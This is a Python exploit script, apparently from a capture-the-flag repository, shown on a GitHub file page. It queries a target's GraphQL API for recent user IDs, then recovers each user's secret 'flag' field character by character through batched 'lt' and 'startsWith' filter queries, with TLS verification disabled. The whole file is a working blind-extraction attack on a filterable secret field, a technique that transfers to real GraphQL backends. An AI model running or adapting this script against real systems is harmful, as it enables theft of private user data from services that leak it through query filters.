-
Notifications
You must be signed in to change notification settings - Fork 4
/
spl_advanced.py
90 lines (66 loc) · 2.32 KB
/
spl_advanced.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
s = requests.session()
HOST = sys.argv[1]
FLAG_PREFIX = sys.argv[2]
def get_next_chars(flags):
flag_ids = list(flags)
query = "query {"
for pos, user_id in enumerate(flag_ids):
letter = chr(ord("A") + pos)
start = flags[user_id]
query += f'{letter}{1}:users(where:{{id:{{equals:"{user_id}"}},flag:{{lt:"{start}9"}}}}){{id}}'
query += f'{letter}{2}:users(where:{{id:{{equals:"{user_id}"}},flag:{{lt:"{start}I"}}}}){{id}}'
query += f'{letter}{3}:users(where:{{id:{{equals:"{user_id}"}},flag:{{lt:"{start}R"}}}}){{id}}'
query += "}"
json_data = {"query": query}
ans = s.post(f"https://{HOST}:443/api/graphql", json=json_data, verify=False).json()["data"]
user_id_to_abc = {}
for pos, user_id in enumerate(flag_ids):
letter = chr(ord("A") + pos)
if ans[letter+"1"]:
abc = "012345678"
elif ans[letter+"2"]:
abc = "9ABCDEFGH"
elif ans[letter+"3"]:
abc = "IJKLMNOPQ"
else:
abc = "RSTUVWXYZ"
user_id_to_abc[user_id] = abc
query = "query{"
for pos, user_id in enumerate(flag_ids):
letter = chr(ord("A") + pos)
abc = user_id_to_abc[user_id]
start = flags[user_id]
for c in abc[:-1]:
query += f'{letter}{c}:users(where:{{id:{{equals:"{user_id}"}},flag:{{startsWith:"{start}{c}"}}}}){{id}}'
query += "}"
json_data = {"query": query}
ans = s.post(f"https://{HOST}:443/api/graphql", json=json_data, verify=False).json()["data"]
ans = [a for a in ans if ans[a]]
for pos, user_id in enumerate(flag_ids):
abc = user_id_to_abc[user_id]
letter = chr(ord("A") + pos)
char = abc[-1]
for c in abc:
if letter + c in ans:
char = c
break
flags[user_id] += char
def print_flags_by_ids(flag_ids):
flags = {flag_id: FLAG_PREFIX for flag_id in flag_ids}
for i in range(len(FLAG_PREFIX), len(FLAG_PREFIX)+32):
get_next_chars(flags)
for flag in flags.values():
print(flag)
def get_id_list():
json_data = {
"query":"query{users(take:8,orderBy:{createdAt:desc}){id}}"
}
items = s.post(f"https://{HOST}:{443}/api/graphql", json=json_data, verify=False).json()["data"]["users"]
id_list = [i["id"] for i in items]
return id_list
user_ids = get_id_list()
print_flags_by_ids(user_ids)